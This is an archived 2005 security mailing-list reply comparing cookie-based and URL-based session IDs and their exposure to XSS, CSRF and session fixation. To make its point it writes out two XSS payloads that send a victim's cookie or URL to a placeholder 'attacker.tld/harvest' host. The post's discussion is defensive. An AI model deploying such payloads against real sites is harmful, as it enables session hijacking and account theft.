|
WebApp Sec
mailing list archives
Re: Maia Mailgaurd http://www.renaissoft.com/maia/
From: Achim Hoffmann <kirke11 () securenet de>
Date: Wed, 20 Jul 2005 12:32:24 +0200 (MEST)
On Mon, 18 Jul 2005, Chuck wrote:
!! Responses below....
!!
!! On 7/18/05, Achim Hoffmann <kirke11 () securenet de> wrote:
!! > !! In short, you are better off putting the session id in a cookie than
!! > !! putting it in the URL.
!!
!! > In short, it is much simpler to steal session ids from cookies than from
!! > URL, exceptions see below.
!!
!! No, they are both easy.
"both easy" disagreed, explanation see below
!! If there is a XSS on the site, then you can
!! get the URL with window.location.href.
That is basicly right, but the cases where you can exploit it are limited to
those where you can place the malicious content or link inside the application
itself, for example inside a user forum.
Or in other words: without first knowing the session ID (which is in the URL)
you cannot exploit it remotely, in particular you cannot send an HTML email
containing the malicious link.
Examples:
a) using cookies containing session ID
you simply can send a malicious link to a user (or tweak him otherwise
to click on it) which returns the cookie like:
https://vulnerable.tld/appl.cgi?xssHole=<script>document.location=
'http://attacker.tld/harvest?sid='+document.cookie</script>
b) using URL rewriting containing session ID
now we have a link like:
https://vulnerable.tld/appl.cgi;sid=someSessionID
even if the attacker knows of a XSS vulnerability in appl.cgi (like
explained in the above example), it's not possible to exploit it 'cause
the mandatory sid=someSessionID is missing
tweaking the user to click on:
https://vulnerable.tld/appl.cgi?xssHole=<script>document.location=
'http://attacker.tld/harvest?sid='+location.href</script>
will not work cause there is no session ID in the current URL
In 90% or more of cases XSS is present in a transient form, that is you have to
pass the stealing-code in a link (in an email or another website) to the user.
But in this case, there is no session-ID-context and thus no session ID inside
an URL that can be stolen (it is the URL you pass, that you access with
location.href). Only if it is in the cookie it can be stolen in this way.
I consider this a fundamental difference in exploitability and thus a big
advantage for URL rewriting.
Other pro-URL-rewriting arguments:
- perhaps the second top most vulnerability after XSS in web applications
today is Session Riding (aka CSRF, aka web trojan, see
http://www.securenet.de/papers/Session_Riding.pdf)
URL rewriting is safe against Session Riding. With cookies you have to
take further measures.
- Session Fixation, although not generelly impossible with URL rewriting, is
much more often encountered with cookie-based session management.
Of course, there are disadvantages of URL rewriting and it depends on the
application:
- application has to ensure that the session ID is not within other links
- application has to ensure that the page does not contain links to external
websites 'cause it then will send the session ID in the refer(r)er header
But in general I tend to recommend URL rewriting over cookies.
Best, of course, is to use both: the session ID inside a cookie and an
additional secret inside the URL. But this is much more expensive as it is
not automatically handeled by todays libs and frameworks.
{-: Achim
 By Date 
By Thread
Current thread:
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/, (continued)
Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Stelian Ene (Jul 18)
|
Intro
